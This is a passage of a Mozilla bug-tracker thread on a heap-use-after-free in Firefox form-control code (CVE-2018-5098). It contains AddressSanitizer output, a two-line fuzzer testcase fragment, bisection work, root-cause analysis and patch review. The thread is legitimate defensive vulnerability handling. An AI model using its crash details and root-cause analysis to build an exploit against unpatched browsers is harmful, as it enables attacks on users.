    #31 0x7f51f4de14cf in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:400:12
    #32 0x7f51f4de3c7e in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:689:12
    #33 0x7f51f5095085 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #34 0x7f51f5095085 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #35 0x7f51f507548f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #36 0x7f51f507548f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #37 0x7f51f505a64d in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12

SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/dom/base/nsINode.h:1630:12 in GetBoolFlag
Shadow bytes around the buggy address:
  0x0c2a8009e6e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2a8009e6f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2a8009e700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2a8009e710: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2a8009e720: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c2a8009e730: fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd
  0x0c2a8009e740: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a8009e750: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a8009e760: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa
  0x0c2a8009e770: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2a8009e780: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==29513==ABORTING
Attached file ASAN output
Is 57 (nightly) affected? If not we need to figure out if this was fixed along the way (maybe we'll get a free patch) or whether a broken back-port introduced this into the ESR branch.
Group: core-security → dom-core-security
Component: Layout: Form Controls → DOM: Core & HTML
Whiteboard: [fixwindow-wanted]
mrbkap, can you take a quick look here to see if there's an easy fix?
Flags: needinfo?(mrbkap)
Assignee: nobody → mrbkap
Flags: needinfo?(mrbkap)
Priority: -- → P1
Quick update: the testcase as written is broken:

  o1=window.open('data:text/html,<div><div><div>','popup35','height=134');
  o1.onload=fun0;

as of the changes in bug 1324406 data: URIs are cross-origin and are therefore opaque so the testcase errors out early on.

(Where is one supposed to find the fuzzPriv extension? I Googled around and ended up building it from source from [1], but is there a better source for it?)

[1] https://github.com/MozillaSecurity/domfuzz
(In reply to Blake Kaplan (:mrbkap) from comment #4)
> (Where is one supposed to find the fuzzPriv extension? I Googled around and
> ended up building it from source from [1], but is there a better source for
> it?)
> 
> [1] https://github.com/MozillaSecurity/domfuzz

That is the correct source for fuzzPriv.

See also bug 1399400 where GC/CC are available behind --enable-fuzzing and pref fuzzing.enabled=true.
(In reply to Jesse Schwartzentruber (:truber) from comment #5)
> See also bug 1399400 where GC/CC are available behind --enable-fuzzing and
> pref fuzzing.enabled=true.

Sorry, this should be bug 1322400.
After fixing the data: URI to be another (same origin) page, installing fuzzPriv, allowing popups, and testing on a window manager that supports resizing, I'm unable to reproduce on central on OSX or Linux. I could try to bisect to see if I can figure out when this regressed/got fixed, if needed.
Flags: needinfo?(dveditz)
(In reply to Blake Kaplan (:mrbkap) from comment #7)
> After fixing the data: URI to be another (same origin) page,

... or you could have just changed the pref security.data_uri.unique_opaque_origin back

> I'm unable to reproduce on central on OSX or Linux. I could try to
> bisect to see if I can figure out when this regressed/got fixed, if needed.

I'd have expected Nils to file against Nightly if it were reproducable there. We need to answer two questions

- Was this introduced on the ESR 52 branch by a backport?
** if 52.0 is clean then bisect ESR 52 for the regressing patch

- Was this fixed on trunk?
** if 52.0.0 shows the problem bisect mozilla-central for the fix

Tyson: you've been fuzzing ESR 52 lately. Are these bisections something you could do?
Flags: needinfo?(dveditz) → needinfo?(twsmith)
(In reply to Daniel Veditz [:dveditz] from comment #8)
> (In reply to Blake Kaplan (:mrbkap) from comment #7)
> > After fixing the data: URI to be another (same origin) page,
> 
> ... or you could have just changed the pref
> security.data_uri.unique_opaque_origin back
> 
> > I'm unable to reproduce on central on OSX or Linux. I could try to
> > bisect to see if I can figure out when this regressed/got fixed, if needed.
> 
> I'd have expected Nils to file against Nightly if it were reproducable
> there. We need to answer two questions
> 
> - Was this introduced on the ESR 52 branch by a backport?
> ** if 52.0 is clean then bisect ESR 52 for the regressing patch
> 
> - Was this fixed on trunk?
> ** if 52.0.0 shows the problem bisect mozilla-central for the fix
> 
> Tyson: you've been fuzzing ESR 52 lately. Are these bisections something you
> could do?

I'm in the process of bisecting this.  I'll update once it's complete.
Flags: needinfo?(twsmith) → needinfo?(jkratzer)
For some reason, all local ESR52 builds from 52.0.1 (4af7cd795eee) to tip trigger this issue.  However, I cannot get this issue to trigger using the earliest available taskcluster build (283e5bdcd11e).

I'll see if I can't track this issue down in m-c.
Flags: needinfo?(jkratzer)
Bisection on mozilla-central determined that the first good revision is:
changeset:   361853:d44994c67873
parent:      361803:9255719d469c
user:        Ehsan Akhgari <ehsan@mozilla.com>
date:        Wed May 31 17:45:09 2017 -0400
summary:     Bug 1369140 - Part 1: Revert to only flushing styles when checking whether an element is focusable; r=bzbarsky
Maybe Ehsan (author of patch in bug 1369140) or bz (reviewer of said patch) can chime in here on this sec-high UAF bug.
Flags: needinfo?(ehsan)
Flags: needinfo?(bzbarsky)
So the fix for bug 1369140 _fixed_ this issue, right?

That mostly sounds like it covered up the problem, honestly.  We're now not doing layout when we used to, so maybe not firing the resize event or whatnot.

Looking at the crashing stack, we're doing the 015.select() call, do GetPrimaryFrame(), then crash because "this" is dead.  Presumably this bit:

  if (aFlushFrames && IsInComposedDoc()) {
    // Cause a flush of the frames, so we get up-to-date frame information
    GetComposedDoc()->FlushPendingNotifications(Flush_Frames);
  }

at the top of nsGenericHTMLElement::GetFormControlFrame killed "this".  Which is pretty bizarre, because "this" is not only the "this" value for the binding call, but is stored in a global variable in JS, no?

Anyway, the report here predates bug 1371259 being fixed, afaict (it came in a few hours after that patch landed on esr52, so may be from a build that does not include that change).  And that change should _really_ make sure we don't end up with "this" dying in a situation like this.

So the first step is to check whether this still happens on current esr52 builds (which do _not_ have the fix for bug 1369140).
Flags: needinfo?(bzbarsky)
I don't have much to add to comment 13 for now...
Flags: needinfo?(ehsan)
Confusingly, I can't get this to crash on esr52 (on revision [1]). Still investigating...

[1] https://hg.mozilla.org/releases/mozilla-esr52/rev/592df6088926
Blake told me this doesn't affect 57.
Tyson: can you check out the bisection bz talked about in comment 13?
Flags: needinfo?(twsmith)
Summary: heap-use-after-free in nsGenericHTMLElement::GetFormControlFrame → [ESR-52] heap-use-after-free in nsGenericHTMLElement::GetFormControlFrame
(In reply to Boris Zbarsky [:bz] (no decent commit message means r-) from comment #13)
> So the first step is to check whether this still happens on current esr52
> builds (which do _not_ have the fix for bug 1369140).

I verified this is still reproducible on the latest ESR52
BuildID=20171109201650
SourceStamp=f9df5238dca13e40b8128faba317df25e2f69249
Flags: needinfo?(twsmith)
Hi Tyson, can you give me some detailed STR to reproduce this? I've still never reproduced this on any branch or any revision. I'm wondering if I'm maybe doing something wrong.
Flags: needinfo?(twsmith)
(In reply to Blake Kaplan (:mrbkap) from comment #19)
> Hi Tyson, can you give me some detailed STR to reproduce this? I've still
> never reproduced this on any branch or any revision. I'm wondering if I'm
> maybe doing something wrong.

Hi Blake, I assume the issue is that this testcase requires the fuzzPriv[1] extension. The easiest way to test IMO is to use FFPuppet[2] to launch the builds and collect the logs (it also makes using extension, custom prefs.js files and alternate profiles very simple). Last you can use fuzzfetch[3] to collect the required build from TC.

[1] https://github.com/MozillaSecurity/domfuzz/tree/master/dom/extension
[2] https://github.com/MozillaSecurity/ffpuppet
[3] https://github.com/MozillaSecurity/fuzzfetch
Flags: needinfo?(twsmith)
I still haven't reproduced this so instead I've been reading lots of code. I think I know what's happening.

From the crash stack:
    #6 0x7f51ef3566ba in mozilla::dom::HTMLInputElement::Select() /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:3724
    #7 0x7f51ef3563b7 in mozilla::dom::HTMLInputElement::Select() /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:3688:14

This is tricky. The "recursive" call here is moving from the <input type=number> to its native anonymous subtree's input element (that's why it doesn't matter about the node in the binding or the global JS variable).

I'm not entirely sure, but I think that we end up in that select call in the middle of the input element's move to the outer document. That could lead to code here [1] which would call into the focus manager (and failing to set focus because of [2][3]) but calling nsFocusManager::CheckIfFocusable, which is the function that Ehsan fixed to do less work, making us destroy the native anonymous content (and running GC) leaving us with a destroyed HTMLInput element).

This is all super speculative though. I'll attach a patch for ESR that wallpapers over this. Tyson, would you be able to see if it fixes this for you?

[1] https://searchfox.org/mozilla-central/rev/be78e6ea9b10b1f5b2b3b013f01d86e1062abb2b/dom/html/HTMLInputElement.cpp#3499
[2] https://searchfox.org/mozilla-central/rev/be78e6ea9b10b1f5b2b3b013f01d86e1062abb2b/dom/base/nsFocusManager.cpp#1872
[3] https://searchfox.org/mozilla-central/source/dom/base/nsGlobalWindowInner.cpp#4401
Attached patch Hold onto this element (obsolete) — Splinter Review
Comment on attachment 8933172 [details] [diff] [review]
Hold onto this element

(I'm leaving the commit message intentionally vague for the time being.)

Boris, does anything I said in comment 21 make sense?
Flags: needinfo?(twsmith)
Attachment #8933172 - Flags: feedback?(bzbarsky)
(In reply to Blake Kaplan (:mrbkap) from comment #23)
> Comment on attachment 8933172 [details] [diff] [review]
> Hold onto this element

Verified on ESR52 with the patch and no UAF.
Flags: needinfo?(twsmith)
Attached patch Patch v2 (obsolete) — Splinter Review
I looked at the other uses of mTextField and this was the only other one that seemed like it might be similar enough to warrent a strong ref.

I don't know if there is a way to trigger this bug on central -- we do
still call into the focus manager (as well as other code) and I haven't
tracked down all of the possible side effects. Ehsan's patch might just
be enough to avoid the possible destruction of the anonymous content
tree for the input element under select/focus, but I can't prove it.
That being said, an additional ref count shouldn't be visible in these
call paths, so I'd like to land this patch on central as well as esr52.

MozReview-Commit-ID: 4EqS1huHnVN
Attachment #8934762 - Flags: review?(bzbarsky)
Attachment #8933172 - Attachment is obsolete: true
Attachment #8933172 - Flags: feedback?(bzbarsky)
Comment on attachment 8934762 [details] [diff] [review]
Patch v2

Argh, I'm sorry for the horrible lag here.  I'm still catching up on the Thanksgiving weekend mail deluge.  :(

Comment 21 does make sense.  In particular, the "this" of the _outer_ Select() call is strongly held, but the "this" of the _inner_ one is not.  When the inner Select() then runs script, it kills its own "this", etc.

r=me on this patch.  This code desperately needs some MOZ_CAN_RUN_SCRIPT annotation as a followup...
Attachment #8934762 - Flags: review?(bzbarsky) → review+
Comment on attachment 8934762 [details] [diff] [review]
Patch v2

[Security approval request comment]
How easily could an exploit be constructed based on the patch?

I think it would be quite hard, even on ESR. The testcase requires many moving parts (including multiple windows so the focus manager doesn't keep the anonymous element alive).

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?

No.

Which older supported branches are affected by this flaw?

ESR52.

If not all supported branches, which bug introduced the flaw?

The bug fixed here has been in the code for quite a long time. It has been hidden on trunk by bug 1369140.

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?

Easy to backport.

How likely is this patch to cause regressions; how much testing does it need?

This patch is extremely safe.
Attachment #8934762 - Flags: sec-approval?
(In reply to Blake Kaplan (:mrbkap) from comment #27)

> Which older supported branches are affected by this flaw?
> 
> ESR52.

Why do the flags say that 57 is unaffected? Are they just wrong? I see it commented above that you said 57 is unaffected. Does that mean this is an ESR only issue?
Flags: needinfo?(mrbkap)
(In reply to Al Billings [:abillings] from comment #28)
> Why do the flags say that 57 is unaffected? Are they just wrong? I see it
> commented above that you said 57 is unaffected. Does that mean this is an
> ESR only issue?

I didn't think this affected 57 at all when I commented before. As I said in comment 25, I'm not as sure now if there is a way to trigger this on 57/trunk. At the moment, there is no known testcase that can cause this on branches with the patch for bug 1369140 on them. I'd like to land this on trunk more out of paranoia and defense-in-depth against future changes than a pressing need to address a known problem.
Flags: needinfo?(mrbkap)
Comment on attachment 8934762 [details] [diff] [review]
Patch v2

Ok. Sec-approval+ for trunk.
I assume we want to take this on ESR52 since it is clearly affected there.
Attachment #8934762 - Flags: sec-approval? → sec-approval+
Backed out from inbound for bustage.
https://hg.mozilla.org/integration/mozilla-inbound/rev/03aebc551f9da0dfbe383c39d2fcb2f2975eeecc

https://treeherder.mozilla.org/logviewer.html#?job_id=151102412&repo=mozilla-inbound
layout/forms/nsNumberControlFrame.cpp:595:5: error: Unused "kungFuDeathGrip" 'nsCOMPtr<Element>' (aka 'nsCOMPtr<mozilla::dom::Element>') objects constructed from members are prohibited
Tracking this for 59/58, to help keep an eye on this.
MozReview-Commit-ID: IqzGDM4ezeW
Attachment #8936679 - Flags: review+
Attachment #8934762 - Attachment is obsolete: true
I think the new patch is similar enough to the old patch to not need new approvals or reviews.
Flags: needinfo?(mrbkap)
Keywords: checkin-needed
https://hg.mozilla.org/mozilla-central/rev/02d457ace9bb
Status: NEW → RESOLVED
Closed: 6 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla59
Attached patch Merged to esr52Splinter Review
Trivial merge to esr52.
Comment on attachment 8937827 [details] [diff] [review]
Merged to esr52

[Approval Request Comment]
Fix Landed on Version: 59
Risk to taking this patch (and alternatives if risky): Very low risk.
String or UUID changes made by this patch: n/a
Attachment #8937827 - Flags: approval-mozilla-esr52?
Attachment #8936679 - Flags: approval-mozilla-beta?
Comment on attachment 8937827 [details] [diff] [review]
Merged to esr52

sec-high uaf, let's take this on esr52 and beta58.
Attachment #8937827 - Flags: approval-mozilla-esr52? → approval-mozilla-esr52+
Attachment #8936679 - Flags: approval-mozilla-beta? → approval-mozilla-beta+
Group: dom-core-security → core-security-release
Whiteboard: [fixwindow-wanted] → [fixwindow-wanted][adv-main58+][adv-esr52.6+]
Alias: CVE-2018-5098
Summary: [ESR-52] heap-use-after-free in nsGenericHTMLElement::GetFormControlFrame → heap-use-after-free in nsGenericHTMLElement::GetFormControlFrame
Flags: qe-verify+
Whiteboard: [fixwindow-wanted][adv-main58+][adv-esr52.6+] → [fixwindow-wanted][adv-main58+][adv-esr52.6+][post-critsmash-triage]
Flags: sec-bounty?
I couldn't reproduce the crash using the testcase and a linux64-asan build. Also, the FuzzPriv extension can not be added to latest builds because it is not a legacy add-on (the preferences to support non-legacy add-ons can't be used on beta and esr).

Tyson, could you please verify that this issue is properly fixed? Thank you!
Flags: needinfo?(twsmith)
Flags: sec-bounty? → sec-bounty+
Verified release using a fuzzing build which is compatible with the new fuzzpriv[1] web extension.
Verified ESR using standard ASan build. FFPuppet[2] sets prefs to allow fuzzpriv (legacy) to work.

[1] https://github.com/MozillaSecurity/fuzzpriv
[2] https://github.com/MozillaSecurity/ffpuppet
Status: RESOLVED → VERIFIED
Flags: needinfo?(twsmith)
Thanks a lot Tyson!
I'm removing the qe-verify+ flag.
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.